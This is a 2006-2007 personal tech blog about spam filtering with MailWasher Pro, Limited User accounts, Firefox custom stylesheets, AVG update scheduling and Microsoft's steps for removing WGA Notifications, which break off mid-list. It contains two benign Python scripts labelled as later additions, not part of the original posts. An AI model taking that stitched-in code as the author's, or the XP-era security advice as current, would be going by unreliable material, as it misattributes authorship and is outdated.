I use MailWasher Pro, every day, all day long, to screen all of my incoming email for spam, scams and malware, across two dozen POP3 accounts, and my custom filter rules usually block almost all incoming spam, scams and malware embedded in or attached to email messages. This includes image spam promoting pump and dump stocks or counterfeit drugs, and fraudulent e-card/postcard messages with links to hostile scripts that might turn your PC into a member of a Zombie BotNet. However, as spammers tend to alter their codes occasionally, from one spam run to another, sometimes a previously effective rule will fail to block a known type of spam. I usually detect these changes and apply them to existing or new filter rules within minutes of discovering a failure to detect and delete that type of spam. I then publish these alterations and/or additions to copies of my filters that are available for copying and pasting into your own MWP filters.txt file. See my extended comments for more information about the location of the Filters.txt file.

The gist of all this is that since I hate spam and spammers I have been updating and fine-tuning my MailWasher Pro filters quite often these days, sometimes more than once per day, to respond to changes in spam runs. You can find my most recently updated/uploaded filter sets on my MailWasher Pro Filters page. Since this is time consuming work I am not too proud to accept PayPal donations from any of you who are benefiting from my ongoing filters work and can afford to make a contribution to the cause. Thanks in advance!

See my MailWasher Pro product details page for complete information about this spam screening tool, with links to download a trial version, or to purchase a permanent license (pay once, get upgrades for life). I am also available for hire to write custom MailWasher filter rules for individuals or organizations. Contact me with your requirements and I'll send you an estimate.


May 3, 2007

Limited User Privileges Protect Against Malware Infections

With viruses, spyware, adware, keyloggers, browser/search hijackers, rootkits, and remote control spam relays infecting or taking over control of up to 75% (estimates) of the online Windows computers in the world, responsible, concerned people want to know how they can protect their computers from such rampant, recurring threats. Many folks I know have had spyware or viruses removed only to have them reappear some time later and they are confounded, because they don't realize how these threats get installed in the first place.

Running anti-virus, anti-spyware and firewall applications is a must for Windows users, but they may not stop something malicious that slips past your defenses hidden inside a program or file you intentionally downloaded and installed. The innocent application or utility you downloaded may have installed a backdoor program on your computer, and that program may take over control and allow more malware to be sent to your computer. Many of the multiple infections that occur so often are piggybacked onto downloaders that get installed first, without your knowledge. They lower your security settings and sometimes hide from known security programs until it is too late. Some of them even terminate anti-virus, anti-spyware and firewall programs, leaving you totally unprotected.

These hidden threats inside supposedly useful programs are called Trojan Horses, named after the legendary huge wooden gift horse that the Greek invaders gave to the army of Troy, after a lengthy siege. It was supposed to be a symbol of submission from a defeated enemy (the Greek army) to the winners (the Trojans). Somehow the Trojans were fooled into accepting the gift horse, thinking that the Greek army had evacuated the area and given up the siege. They brought it into their gates and celebrated their alleged victory and when they were good and drunk the Greek soldiers who were hidden inside the hollow places in the wooden horse emerged, opened the gates to let in the rest of their hidden army, then slaughtered the Trojan soldiers and men and sold the women and children into slavery. So the legend goes and so go the modern day software soldiers who hide encoded inside seemingly useful programs, only to invade your system and wreak havoc.

Any infected code that you acquire and activate, or is self activating, will be run with the same rights as the logged-on user, which in most cases is Administrator level rights (privileges).

All of the previously mentioned malware threats require computer administrator privileges to fully install themselves into the operating system, or overwrite system files, or to write to the Local_Machine branch of the Windows Registry, or to hide as rootkits. Windows 2000 and XP users running with reduced privileges, as a Limited User, are protected against virtually all malware threats that need to install into the system to function. Windows 2000 or XP Professional Power Users have reduced, but not complete, vulnerability to these threats. I personally run as a Power User and have not acquired any drive-by, downloaded, or browser exploited malware infections at all. I also use several anti-spyware programs, an anti-virus program and both hardware and software firewalls. I browse with Firefox, not Internet Explorer, and keep everything up to date with patches and security fixes as soon as I learn about their availability. Then I post notices on my blog to alert you all.

Some of my readers have problems running as Limited Users and I help them as much as possible to understand how things need to be done to work within and around those limitations. If you run with reduced user privileges your choice of updates will be more limited than if you apply them from an administrator level account. You would do this by first applying the updates as a Limited or Power User, then Switch Users or log onto an Administrator account and re-apply the updates and immunizations. Many security programs will require you to switch to, or log into an administrator level account to perform program updates (if not definition updates), then reboot. Others are more friendly to Limited Users after being installed by an Administrator.

I have posted more information about running with reduced user privileges, here and here.

Always assign a strong password to any Computer Administrator level accounts. Always try to run as a Limited User, or at most a Power User, under Windows 2000 or XP Professional. The Power User group is not available in XP Home, so don't bother looking for it.

Windows Vista begins a new era in user protection (out of the box) by running all accounts as Limited Users, with Power User-like rights and rights elevation prompts when you try to do something that requires full administrative privileges. I will blog about Vista's User Account Controls, and its rights elevation prompts, in a separate article, on a future date.


March 17, 2007

How I fixed my Dell Latitude's mouse wandering problem

I am the happy owner of a used Dell Latitude C610 laptop computer. It hums away on Windows XP Professional, with 512 MB of RAM and a smallish 20 GB hard drive. The Latitude battery still delivers over 5 hours uptime at full charge. The monitor screen is crisp and bright and I only paid $250 for it in a computer store. My only gripe has been with the mouse pointer wandering on its own, at random times, for no apparent reason, sometimes completely out of sight.

I did a little online research on Google and found several forums where other Latitude users were complaining about the same wandering / drifting mouse pointer problems as I had (past tense). I read about some pretty drastic solutions some people have used to stop the drifting pointers, including opening up the case and cutting wires. That sounded like a way-too-drastic way to cure the problem. Other suggestions I saw involved opening the case, lifting the keyboard, then inserting an anti-static hardware bag over a metal clip, which supposedly was rubbing against the touch pad's bottom side.

Then in the midst of all this madness I found one voice of sanity from a user who simply downloaded the newest touch pad drivers for his Dell laptop. I followed up that link to the Synaptics website, where they offer generic drivers for their touch pad devices, but also provided links to each manufacturer who uses their touch pads. Dell was listed, so I went to the Dell support site, followed links and options to get to all available downloads for my Latitude C610, scrolled through the long list and finally found an update for the Dell-Synaptic Touch pad. Bingo!

After downloading and installing the new touch pad driver I rebooted (required). When I logged back into Windows I found a new icon in the SysTray, for the Synaptics Touch pad. I opened the new Mouse/Touch-Pad Pointer Properties and went through all of the new options. One option is to disable the Joystick pointer that looks like a pencil eraser, in the midst of the keyboard, or to change its sensitivity. I opted to make it less sensitive rather than disabling it, and voila, my drifting pointer problem was gone! No cutting of wires, or inserting of bags under the chassis. A simple software download and a few minutes of configuring the awesome new pointer options and all was well with my mouse pointer, on my Dell Latitude. Plus, I took advantage of other new options in the software and enabled horizontal and vertical scroll zones and tap to click on the touch pad.

If you own a Dell laptop and your pointer is drifting all over the place, visit the Dell support website, or the Synaptics website and download the newest driver for your touch pad and operating system.


March 8, 2007

About the QuickTime Alternative Player-Plug-in

Over the past few months there have been a slew of vulnerabilities reported and patched in the Apple QuickTime Player-Plug-in application. QuickTime ships with Apple iTunes when people install that application onto their computers, and millions of other folks install QuickTime to play .mov videos and mp3 files in their browsers. That means that tens or hundreds of millions of computers have QuickTime installed, and knowing the way a lot of people (don't) think about security updates, a large percentage of them are outdated and vulnerable versions of the application. In my previous blog post I covered six new extremely critical vulnerabilities in Apple's QuickTime Player-Plug-in, disclosed in early March 2007. If you are thinking there has to be a better way to play mp3, .mov and other QuickTime file formats, without leaving your computer open to takeover from exploits against the Apple QuickTime Player, read on.


QuickTime Alternative will allow you to play QuickTime files (.mov, .qt, .3gp and other extensions) without having to install the official QuickTime Player. It also supports QuickTime content that is embedded in webpages. If you browse with Firefox and load a page that has embedded .mp3 or .wav music you have probably seen a yellow notice bar appear telling you that you need to install a missing plug-in to play content on that page. It usually refers to an embedded sound file that normally plays automatically in Internet Explorer and the recommended Firefox plug-in is almost always Apple QuickTime. The QuickTime Alternative satisfies that missing plug-in problem and will automatically playback embedded audio files, after you configure it to do so.

I have been using a free alternative to the QuickTime Player-Plug-in for several years, through various updates. It plays all of the file formats that the official player handles, when configured to play them, more securely than the Apple version. The free QuickTime Alternative player is available from free-codecs.com, on this page. Click on the Download link then look through the list of files for the most recent version, for your operating system. At the time I wrote this the newest version was 1.78, released on March 7, 2007. The alternative player is updated to remain compatible with the file types handled by QuickTime, and is not vulnerable to the same exploits as the official player is. The underlying application behind the QuickTime Alternative is called Media Player Classic, which is updated every time the alternative QuickTime player is updated.

If you decide to install the alternative player as a substitute, you must configure it to handle the file types you want it associated with, as the default player. Details for doing this are in my extended comments.

Also available for free download is a Real Media Alternative Player. Real Alternative will allow you to play RealMedia files without having to install RealPlayer/RealOne Player.


January 16, 2007

How to create a custom personal stylesheet for Firefox browsers

This article really falls under the category of Usability and Accessibility, as it deals with overriding fonts that are hard to read for some people with sight problems. Viewability has often been overlooked by website template writers who may be young and gifted with very good eyesight, hence they code their fonts to be a fixed size that they find comfortable. Those font sizes are often entirely too small for the elderly, or people with limited sight, to resolve. Add to this the fact that web browsers are designed to display web pages as per the styles and fonts specified by the site designers, and that while these font sizes can be overridden, it is not always obvious to users how they can do so. Furthermore, even if these folks know how to override default fonts on a webpage, they are forced to do this every time they revisit that website, since browsers reset to factory default display mode after being closed and re-opened.

I have often been asked for advice on changing website specified fonts to those preferred by the users, on forums and via direct inquiries (I am the Wiz and am assumed to know all the answers to all the questions!). Instances where this is an issue are typically on forums, where the default stylesheet uses fixed font sizes and/or colors, which the viewer may find difficult to read. People gifted with good eyesight shouldn't scoff at this. Your day is coming too.

On a forum where I am the Moderator I was recently asked if it is possible to override the default font size permanently, just for that forum. The administrator is planning to rewrite the stylesheets to allow relative font sizes to be used, which is definitely more user friendly, especially to those with poor eyesight, but until that is accomplished I was able to find a means whereby people using Firefox browsers can create their own custom stylesheet in place of the one used by that forum. The really interesting thing about this custom stylesheet is that it can be specifically targeted to control only the fonts (family, size, color, boldness) on a particular webpage, or for an entire domain. This is good news if you are a frequent reader of a particular forum that uses fixed fonts that you have trouble reading. I have researched a solution for Firefox browser users to override the fonts on a particular website, or even on a particular page or sub-forum. From now on I will refer to this location as the URL.

The rest of this article pertains to the Firefox custom stylesheet workaround. I will publish information for Internet Explorer users in another article.

To begin, you will need to find your Firefox Profile folder. Instructions for locating this folder are here, in my extended comments.

The method:
Once you have opened your Firefox Profile folder, open the sub-directory named "Chrome". In it you will have to create a new text file and name it userContent.css. You can do this in Windows using Notepad, by right-clicking inside the Chrome folder and left-clicking on "New," then left-clicking on "Text document." After you add the pertinent commands to the new text document you should rename it to userContent.css (right-click on the file and choose Rename, then type or paste in the new name, then click away from it). Alternately, you can open the sample file named "userContent-example.css" and edit it, then Save As, or Rename it to userContent.css

Here is an example of a custom Firefox Stylesheet to increase the font size, using Percentages or EMs as a measurement, for an exemplified forum URL, where the forum runs on current phpBB code.

@-moz-document url-prefix(http://www.forum.domain.com/) {
.postbody { font-size : 1.2em !important; }
}

Or else, use percentages, like this:

@-moz-document url-prefix(http://www.forum.domain.com/) {
.postbody { font-size : 120% !important; }
}

If the forum's BB code for the class postbody includes a fixed size line-height declaration you can add this to your custom rule: line-height: 1.3em !important;, or line-height: 130% !important;. Alter the em or % number to obtain the best line spacing and to avoid cutting off lower parts of drop letters, like lowercase g, j, p, q, or y.

You would change the URL (http://www.forum.domain.com/) to that of your preferred forum, by copying and pasting it from your browser's address bar. If the forum runs on phpBB code and you want to change the font size in the body of Posts, leave the class .postbody as is. Otherwise, you can specify the body selector to override all font sizes, and use a percentage increase instead of a set font size. Adding !important to the declaration causes your style rule to override that of the website.

You can discover what stylesheet or css rules are being applied to a web page by viewing the source. In Firefox you press Control + U. Some stylesheets are included in the page you are viewing, within a set of <style> ... </style> tags. Others are in external files. Look in the HEAD section for a line containing: <link rel="stylesheet" type="text/css" href="URL">. Note the location of the external css file as listed in the href=" " part, then highlight and copy it with your mouse. Then go back to the web page in the browser, click on the URL in the address bar, remove any filename and sub-directory that is showing and paste the location of the stylesheet onto the end of the base URL, like this deactivated example:

ht*p://w*w.example.com/templates/site-style.css

If you got it right, the stylesheet will display as plain text in the browser, where you can read it or save it as a .css or .txt file. Study the stylesheet to learn the names of the classes (names beginning with a period, as in .postbody) and IDs (names beginning with a # sign, like #content) that are assigned the font size rules you want to override, and use those class or ID names in your custom stylesheet for that website.
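To automate the stylesheet hunt described above, here is an added Python example (my own, not part of the original post) that pulls the stylesheet links out of saved page source, resolves them to absolute URLs the way the address-bar step does, lists the class and ID selectors that set a font-size, and emits the matching userContent.css rule. The HTML, CSS and forum URL in it are constructed samples.

```python
"""Find a page's stylesheets and the class/id selectors that set a font-size,
then emit the matching userContent.css override.

Added example, not from the original post. It runs offline on constructed
HTML and CSS samples; swap in the page source you saved with Control + U,
the stylesheet text you fetched, and your own forum URL."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed HEAD section of a forum page (forum.domain.com is a placeholder).
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" type="text/css" href="templates/site-style.css">
<link rel="stylesheet" href="/styles/print.css" media="print">
<style>.postbody { font-size: 11px; }</style>
</head><body><div class="postbody">Hello</div></body></html>"""

# Constructed stylesheet, as it would display in the browser as plain text.
SAMPLE_CSS = """
body { font-size: 10px; line-height: 1.2em; }
.postbody { font-size: 1.1em; color: #333; }
#content, .sidebar { font-size: 9px; }
.postbody a { color: blue; }
"""


class StylesheetLinks(HTMLParser):
    """Collect href values of <link rel="stylesheet"> tags and inline <style> text."""

    def __init__(self):
        super().__init__()
        self.hrefs = []
        self.inline_css = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        rel = (a.get("rel") or "").lower().split()
        if tag == "link" and "stylesheet" in rel and a.get("href"):
            self.hrefs.append(a["href"])
        elif tag == "style":
            self._in_style = True

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:
            self.inline_css.append(data)


def _parse(html):
    p = StylesheetLinks()
    p.feed(html)
    return p


def stylesheet_urls(page_url, html):
    """Absolute URLs of the page's external stylesheets. urljoin does what the
    manual step describes: drop the page's file name (and a relative
    sub-directory) and append the stylesheet path to the base URL."""
    return [urljoin(page_url, h) for h in _parse(html).hrefs]


def inline_css(html):
    """CSS from <style> ... </style> blocks embedded in the page itself."""
    return "\n".join(_parse(html).inline_css)


RULE_RE = re.compile(r"([^{}]+)\{([^}]*)\}", re.S)
SIZE_RE = re.compile(r"font-size\s*:\s*([^;]+)", re.I)


def font_size_selectors(css):
    """Map each class (.x) or id (#x) selector that declares font-size to the
    declared value. Compound selectors like '.postbody a' are skipped."""
    found = {}
    for selectors, body in RULE_RE.findall(css):
        m = SIZE_RE.search(body)
        if not m:
            continue
        for sel in selectors.split(","):
            sel = sel.strip()
            if sel.startswith((".", "#")) and " " not in sel:
                found[sel] = m.group(1).strip()
    return found


def override_rule(site_prefix, selectors, percent):
    """Build the @-moz-document rule for userContent.css, one !important
    font-size override per selector."""
    lines = [f"@-moz-document url-prefix({site_prefix}) {{"]
    for sel in sorted(selectors):
        lines.append(f"  {sel} {{ font-size: {percent}% !important; }}")
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    page = "http://www.forum.domain.com/viewtopic.php?t=1"
    print(stylesheet_urls(page, SAMPLE_HTML))
    found = font_size_selectors(SAMPLE_CSS)
    found.update(font_size_selectors(inline_css(SAMPLE_HTML)))
    print(override_rule("http://www.forum.domain.com/", found, 120))
```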

By employing these techniques you can override the preset styles of virtually any website you may frequent, making it easier to view for your eyesight and monitor size situation. I will be posting more information about other techniques to change the font sizes in other articles on my blog.


December 5, 2006

MailWasher Pro Image Spam Filters Updated

CastleCops A new filter set for MWP users brought to you by Wizcrafts!

I just updated my most effective MailWasher Pro image spam filter to catch a new variant: JPEGs instead of GIFs. The updated filters are here.

The new rule, just under the "Restored From MailWasher Recycle Bin" rule, catches 99% of the image spam sent to me. It uses only one regular expression and is faster acting than the other rules that use more regular expression matches.

If you are not currently using a spam filter and are getting deluged with image spams for penny stocks, the combination of the email screening program MailWasher Pro and my custom MailWasher filters will reduce your visible spam to a tiny percentage of what you are probably seeing right now.

Note: The MailWasher Pro filters.txt does not go into the program directory. It goes into the MailWasherPro subdirectory under Documents and Settings\(your profile)\Application Data\. You can find this directory and its contents by opening MailWasher Pro, clicking on "Help," then "About," and then on the link at the bottom of the "About" box.


November 8, 2006

Wizcrafts Gets Honorable Mention on CastleCops, for MailWasher Pro Filters

My regular readers know that I use and promote the email screening program - MailWasher Pro. This inexpensive program screens incoming email for threats or spam, using a combination of blacklists, blocklists, user-reported known spam, "Bayesian" learning filters and best of all, user configurable filter rules. The user filters in MailWasher Pro allow for matching positive or negative words and Regular Expressions and are capable of detecting just about any known type of spam trick that exists, by employing the correct combinations of test conditions.

In my last Blog entry about MailWasher Pro I mentioned that I have developed custom filters to detect and delete image spam with garbage text. This spam is quite prevalent now and is entirely sent from tens of thousands of compromised home and office computers, that have been involuntarily drafted into BotNets, by spammers. Bothered by this senseless spam, mostly for investment stocks, I developed a group of filters that recognize variations of this crap and delete it automatically, without me ever having to see it. I have been fine-tuning my image spam filters to catch variations of the original coding, which is changing every week or two.

A few days ago I was reading new posts on the MailWasher Pro Forum at CastleCops, when I came across a topic where the OP (original poster) was looking for help to block these very image spam messages. I answered with a link to my online copy of my MailWasher Pro filters and made a few people very happy with the solution to this type of spam. Since spammers' techniques change frequently, I have been updating my filters to meet those changes, and posting news in a thread that now has my name in the Title. Additionally, I have been further honored by having my filters linked to in the MailWasher Wiki, on CastleCops.com.

If you are troubled by spam, whether in words or images, and are looking for a way to detect and delete it, without having to read it again, try MailWasher Pro. It is free to try for 30 days and only costs $37.00 USD to register, with free updates for life. You can learn more about MailWasher Pro here. There are links on that page to view my custom filters.

Try Firetrust Mailwasher® Pro


October 22, 2006

Automatically Delete Image Spam With MailWasher Pro

If you are barraged with spam for junk stocks, with an image and garbage text, and want to put a stop to it clogging up your inbox, MailWasher Pro is the right tool for the job. If you already have a licensed version of MailWasher Pro you probably know how to use custom user created filter rules to detect and delete spam. But, you may not know how to block image-only spam that comes from zombie home and office computers that are part of a BotNet. I have created and tested filter rules to delete this crap off the mail server without ever seeing it. Learn all about MailWasher Pro here.

If you are already using custom filters you just have to add my filters to the MailWasher Pro filters.txt file. This file is located in your profile under Documents and Settings > (Your_Account_Name folder) > Application Data > MailWasher Pro. You will need to set your Folder View Options to display Hidden Files and Folders and to display known file extensions, or these items will not be visible. If you need to set these options follow the instructions in the Extended Comments ("Read more...").

You will see a file named Filters.txt inside the MailWasher Pro Application Data folder. Open it in Notepad, then open my special filter rules: select all and copy the rules in the popup window, then paste the rules into Filters.txt, near the top of the filters list. Make sure that each rule is on its own continuous line, starting with [enabled]. Be sure that you do not have any blank spaces after the end of any filter rule, or any blank lines between filter rules. These things cause problems in the program. The last rule in Filters.txt should end after its last character, without a linefeed or carriage return.
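Because stray blanks, blank lines and a trailing line break in Filters.txt cause problems, here is an added Python checker (my own example, not Firetrust's code and not the post's filters) that reports those defects, repairs the mechanical ones, and pastes new rules near the top. The rule text is a constructed stand-in, and accepting a leading [disabled] is an assumption.

```python
"""Check a MailWasher Pro Filters.txt for the formatting defects the post warns
about: each rule on one line starting with [enabled], no blank space after a
rule, no blank lines between rules, and no line break after the last rule.

Added example, not from the post or from Firetrust. Rule bodies below are
constructed stand-ins; accepting a leading [disabled] is an assumption."""

VALID_PREFIXES = ("[enabled]", "[disabled]")  # "[disabled]" is assumed

# Constructed sample containing each kind of defect the post describes.
SAMPLE_BAD = (
    "[enabled]Rule one (constructed)\n"
    "[enabled]Rule two (constructed) \n"      # trailing blank space
    "\n"                                      # blank line between rules
    "Rule three (constructed, no prefix)\n"   # does not start with [enabled]
    "[enabled]Rule four (constructed)\r\n"    # CR and LF after the last rule
)


def check_filters_text(text):
    """Return (line_number, message) pairs, one per defect; [] means clean.
    Line numbers are 1-based so they match Notepad's status bar."""
    problems = []
    lines = text.split("\n")
    for n, line in enumerate(lines, 1):
        if line == "":
            if n == len(lines):
                problems.append((n, "line break after the last rule"))
            else:
                problems.append((n, "blank line between rules"))
            continue
        if line != line.rstrip():
            problems.append((n, "blank space or carriage return after rule"))
        if not line.startswith(VALID_PREFIXES):
            problems.append((n, "rule does not start with [enabled]"))
    return problems


def normalize_filters_text(text):
    """Repair what can be fixed mechanically: strip trailing blanks and CRs,
    drop empty lines, and remove the line break after the last rule. A rule
    without a valid prefix is left in place for the checker to report."""
    kept = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    return "\n".join(kept)


def insert_rules_near_top(existing, new_rules, after=1):
    """Paste new rules after the first `after` existing rules (the post says
    'near the top'), normalizing both texts so the join stays clean."""
    old = normalize_filters_text(existing).split("\n") if existing.strip() else []
    new = normalize_filters_text(new_rules).split("\n") if new_rules.strip() else []
    return "\n".join(old[:after] + new + old[after:])


if __name__ == "__main__":
    for n, msg in check_filters_text(SAMPLE_BAD):
        print(f"line {n}: {msg}")
    fixed = normalize_filters_text(SAMPLE_BAD)
    print(repr(fixed))
    print(check_filters_text(fixed))
```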

Since spammers change their particulars from time to time I will alter these rules, or add new ones to continue to block this senseless spam for junk stocks and all other spam. These and the rest of my custom filters are available on my MailWasher Pro page. To be safe in case a legitimate email is deleted by one of these filter rules I have included a rule to display any email that you restore from the MailWasher Pro Recycle Bin. You should turn on this feature by going to Tools > Options > Summary > Recycle Bin and check the option to restore email, then type a valid email address from which you can send email, into the Outgoing Mail Settings field.

Never, ever buy anything that is advertised in a spam email, and never reply to one. Delete, delete, delete! If you are a reporting member of SpamCop you can also report, report, report! MailWasher Pro has a checkbox to forward spam manually to your SpamCop account, but you must respond to their reply message to actually file the report.

MailWasher Pro is free to try for 30 days, and costs only $37.00 to register, which includes a one year, renewable subscription to the FirstAlert! spam reporting system, plus, FREE Mailwasher program updates for life.

MailWasher Pro has always supported Windows and now supports Mac OS X 10.3 and Linux (for list of supported distributions, please see the download page link on this page).

Try Firetrust Mailwasher® Pro


August 19, 2006

Limited User Privileges Protect PCs From Adware, Rootkits, Spyware and Viruses

Published on 08-19-2006 | Updated on 4-24-2007

Webroot, the manufacturer of Spy Sweeper has released a study which finds that 89% of PCs connected to the Internet contain some spyware/adware infections, with the average home computer hosting 30 different malware programs. Furthermore, according to the Webroot® State of Internet Security report, issued on March 28, 2007, 43 percent of companies surveyed globally have suffered a business disruption due to malware and 60 percent of businesses polled don't have an information security plan.

According to the Webroot study, purveyors of malware are increasingly harnessing the popularity of social networks and Web video to infect PCs. Spyware's threat is getting nastier. Infection rates are on the rise, in part thanks to the surging popularity of social-networking sites like MySpace.com.

"We're finding that the social-networking sites like MySpace are turning out to be hotbeds for spyware," CEO Dave Moll says. "People are creating multiple profiles, and the links on their sites will take you to sites that will either download or drive-by download adware and spyware."

It doesn't help that many younger users aren't sufficiently cautious about where and how they surf the Web, Moll says. "They're not looking out for danger in quite the way that more skeptical adults do," he says. "Kids on MySpace and sites like it act as though they are in a safe youth-only environment, and as a result their behavior is less cautious, and that is something that is being preyed upon by all kinds of Internet villains. And we think spyware creators will be the most aggressive in exploiting that."

Spyware creators are also employing a wider arsenal of weapons. They're piggybacking on other, more malicious types of programs such as rootkits, a type of program that conceals itself, and keyloggers, which record a user's keystrokes on a PC.

All of these infections on Windows PCs are possible in part because so many users are operating the computers with Administrator level privileges. This means that a virus or other malware program has the same rights as you do (full control), over the operating system. If the owners of these computers would switch to using a Limited User account to do their browsing, email and instant messaging the infection rate would drop off the measurable radar.

I have devoted an entire web page to the subject of creating and using Limited or Power User accounts, instead of using the default Administrator level account your computer started with. Go read that page, then create a new Limited or Power User account for your daily use. You can copy your existing settings and preferences to the new account, including your desktop icons and start menu items. Alternately, instead of creating a new Limited User account, create a new "Computer Administrator" account, assigning it a password. Log off the account you are using for everyday use and log onto the new "Computer Administrator" account to set it up as an identity. Once inside that account you can go to Start > Control Panel > User Accounts and change your other account to a "Limited User." When you log back onto your regular account all your icons and settings will still be there, but your user rights will be lowered for your protection.

As a Limited user you cannot install some programs, or uninstall any, nor can you run the Disk Defragmenter or manage accounts and policies. To do these things you can either use the Run As command (explained on the Privileges page), or use the Switch User function to log in to your Administrator level account, do what needs doing, then log off that and log back onto the Limited account.

This really works to protect your computer against virtually all of the current known exploits. If you read the various bulletins released every month by Microsoft, concerning this or that new vulnerability, you'll see a paragraph explaining that the scope of the damage is proportional to the level of privileges on the account you are logged onto. If you are using an account that does not have privileges to create, delete, rename, or alter any files in the operating system directories, the danger from accidentally downloaded malware is close to nil, in that account. This includes the entire crop of browser search hijackers and BHOs. They all depend on being able to write to the local machine branch of the Windows Registry to do their dirty work. Furthermore, if something does manage to attach itself to your browser, under a Limited Account, it cannot jump across identities to infect the administrator account, or other user accounts. Also, viruses and spyware cannot disable your anti-virus, or anti spyware, or firewall programs, from within a Limited User account, but those programs can go after the attackers and remove them before they find a way to install into the system.

Read about an exploit that masquerades as a video decoder to install the Zlob Trojan -->


July 24, 2006

Using Windows Task Scheduler to Check for/install AVG-Free Anti Virus Updates | Commandline | Wakes Computer

I was recently participating in a forum discussion about AVG Free anti virus and one of the members complained that AVG's scheduler would a: only check for updates once a day, and b: not look for updates at all when his computer was in standby mode. I researched a solution that I have tested on my own computer and seems to work fine.

I used Windows Task Scheduler to create a task to wake the computer (if asleep) and run the AVG Updater from the scheduler commandline, then automatically either fetch and install an available update, or instantly exit if no update is available at that moment. You can create multiple daily schedules with Windows Task Scheduler, but only one daily with the AVG Free scheduler. Note, that if you create an hourly schedule you should not select the option to wake the computer to run the task!

The steps to create the schedule and the commandline used are listed below.

* Go to Start > All Programs > Accessories > System Tools > Scheduled Tasks
* Open the Task Scheduler and double-click on Add Scheduled Task
* When the Scheduled Tasks Wizard opens click on Next
* When the second tab opens you will have to use the Browse button to locate the AVG program and its updater file
* If you installed AVG into the default directory, navigate to Program Files\Grisoft\AVG Free\avginet.exe and double-click on that file to add it to the scheduler. Type a name for this task; e.g. AVG Updater
* Click on Daily to choose that option, then click Next
* Set the time of day you want it to run, Every Day, and the Start Date, then click Next
* Your account name should be in the User Name field. Type and retype your login password to authorize the scheduled task and click on Next
* Check the option to open the Advanced Properties when you click Finish
* Click on the Settings tab
* "Wake the computer to run this task" is optional but not recommended for hourly tasks. But if you choose to enable it, check the box and click Apply. Click OK. Your task is almost ready to run, but needs at least one edit. Unless you edit the commandline as follows it will not download an update unless you click on the prompt box. My edit bypasses that prompt and automatically downloads and installs updates.
* Go back to the Scheduled Tasks window, locate your new task and double-click on it to open its properties box. You should see this command: "C:\Program Files\Grisoft\AVG Free\avginet.exe"
* Add a space to the end of that command (spacebar) then type this exactly: /SCHED=
* The final command should be: "C:\Program Files\Grisoft\AVG Free\avginet.exe" /SCHED=
* If you are prompted for your user name and password type them in and click OK. If you don't use a password just press Enter.
* You can also modify the schedule from the Schedule Properties by clicking on the Schedule Tab and the Advanced button, where you can schedule it to run any number of times at any interval.
* When you are done editing the schedule click on Apply, then OK, to close the task properties.

Using those steps should wake your computer if it is in standby or hibernation, then poll for updates and download any that are available. It works on my Windows XP Professional computer, using AVG Free, version 7.x.

Wiz


July 10, 2006

How to disable or uninstall the pilot version of Microsoft Windows Genuine Advantage Notifications

If you have inadvertently installed Microsoft Windows Genuine Advantage (WGA) Notifications and are getting popup notices concerning the validity of your operating system, these instructions will help you to remove this optional (at this moment) Windows component.

SUMMARY
This article applies to the version of Microsoft Windows Genuine Advantage (WGA) Notifications that is distributed during the pilot program. For example, this version is included in the pre-release version that accompanies the Microsoft Software License Terms. To safely and easily uninstall the pilot version, you must install the general release version of WGA Notifications. If you do not install this version, you can follow the steps in this article to disable or uninstall the pilot version.

Important These instructions have not been tested on the general release version of the WGA Notifications. Therefore, these instructions are not supported. Microsoft will offer the general release version of WGA Notifications to users who uninstall the pilot version at a later date. These users will obtain the general release version through the Microsoft Automatic Update service. WGA Notifications is part of the Windows Genuine Advantage program.

When you use a non-genuine version of Windows, you receive a message when you log on that states that the copy of Windows appears to be non-genuine. Then, you are directed to the WGA Web site to learn more. If you do not want to obtain a genuine copy of Windows, you receive periodic messages that notify you that the copy of Windows appears to be non-genuine.

Note If you are running a genuine copy of Windows and want to use WGA Notifications, you may receive messages to update Windows XP.

Regardless of genuine status, users are not denied access to critical updates. However, users who have not validated their computers as genuine are not able to install other updates such as those for Microsoft Internet Explorer 7.0 and Microsoft Windows Defender.

MORE INFORMATION
Warning Serious problems might occur if you modify the registry incorrectly by using Registry Editor or by using another method. These problems might require that you reinstall your operating system. Microsoft cannot guarantee that these problems can be solved. Modify the registry at your own risk.

Disable WGA Notifications
1. Log on to the computer by using an account that has administrative permissions.
2. Make sure that the WGA Notifications version that exists on the computer is a pilot version. The version format for the pilot version is 1.5.0532.x. In this case, you can uninstall versions 527-532 only. For example, you can uninstall versions that range from 1.5.0527.0 to 1.5.0532.2. To find the WGA Notifications version, follow these steps:
a. Click Start, and then click Control Panel.
b. Double-click Add or Remove Programs, locate and then click Windows XP - Software, then click Windows Genuine Advantage Notifications, and then click Click here for support information.
c. In the Support Info dialog box, verify the version number, and then click Close.
3. Rename the following files by changing the extension to .old:
• Rename %Windir%\system32\WgaLogon.dll to %Windir%\system32\WgaLogon.old
• Rename %Windir%\system32\WgaTray.exe to %Windir%\system32\WgaTray.old
4. Restart the computer.

Manually uninstall WGA Notifications
1. Log on to the computer by using an account that has administrative permissions.
2. Make sure that the WGA Notifications version that exists on the computer is a pilot version. The version format for the pilot version is 1.5.0532.x. In this case, you can uninstall versions 527-532 only. For example, you can uninstall versions that range from 1.5.0527.0 to 1.5.0532.2. To find the WGA Notifications version, follow these steps:
a. Click Start, and then click Control Panel.
b. Double-click Add or uninstall Programs, locate and then click Windows Genuine Advantage Notifications, and then click Click here for support information.
c. In the Support Info dialog box, verify the version number, and then click Close.
3. Rename the following files by changing the extension to .old:
• Rename %Windir%\system32\WgaLogon.dll to %Windir%\system32\WgaLogon.old
• Rename %Windir%\system32\WgaTray.exe to %Windir%\system32\WgaTray.old
4. Restart the computer.
5. Unregister LegitCheckControl.dll by using Regsvr32. To do this, follow these steps:
a. Click Start, click Run, type cmd, and then click OK.
b. At the command prompt, type the following, and then press ENTER:
Regsvr32 %Windir%\system32\LegitCheckControl.dll /u
6. Restart the computer.
7. Click Start, click Run, type cmd, and then click OK.
8. At the command prompt, delete the following files by typing the Del command. Press ENTER after you type each command.
• Del %Windir%\system32\wgalogon.old
• Del %Windir%\system32\WgaTray.old
• Del %Windir%\system32\LegitCheckControl.dll
9. At the command prompt, type regedit.
10. Locate and then right-click the following registry subkeys. Click Delete after you locate each subkey.
